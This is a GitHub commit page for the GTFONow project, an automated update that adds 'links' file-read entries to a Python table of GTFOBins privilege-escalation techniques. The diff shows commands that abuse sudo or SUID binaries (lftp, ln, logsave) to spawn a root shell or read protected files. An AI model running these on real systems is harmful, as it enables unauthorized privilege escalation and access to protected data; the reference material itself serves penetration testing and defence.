Skip to content

Commit

Permalink
feat: Update GTFOBins (#33)
Browse files Browse the repository at this point in the history
Co-authored-by: Frissi0n <Frissi0n@users.noreply.github.com>
  • Loading branch information
github-actions[bot] and Frissi0n authored Jun 26, 2024
1 parent 149c10d commit 93a21c3
Show file tree
Hide file tree
Showing 2 changed files with 11 additions and 1 deletion.
2 changes: 1 addition & 1 deletion GTFOBins.github.io
10 changes: 10 additions & 0 deletions gtfonow/gtfonow.py
Original file line number Diff line number Diff line change
Expand Up @@ -956,6 +956,11 @@
"code": "sudo lftp -c '!/bin/sh'"
}
],
"links": [
{
"code": "LFILE=file_to_read\nsudo links \"$LFILE\"\n"
}
],
"ln": [
{
"code": "sudo ln -fs /bin/sh /bin/ln\nsudo ln\n"
Expand Down Expand Up @@ -2612,6 +2617,11 @@
"code": "./less file_to_read"
}
],
"links": [
{
"code": "LFILE=file_to_read\n./links \"$LFILE\"\n"
}
],
"logsave": [
{
"code": "./logsave /dev/null /bin/sh -i -p"
Expand Down

0 comments on commit 93a21c3

Please sign in to comment.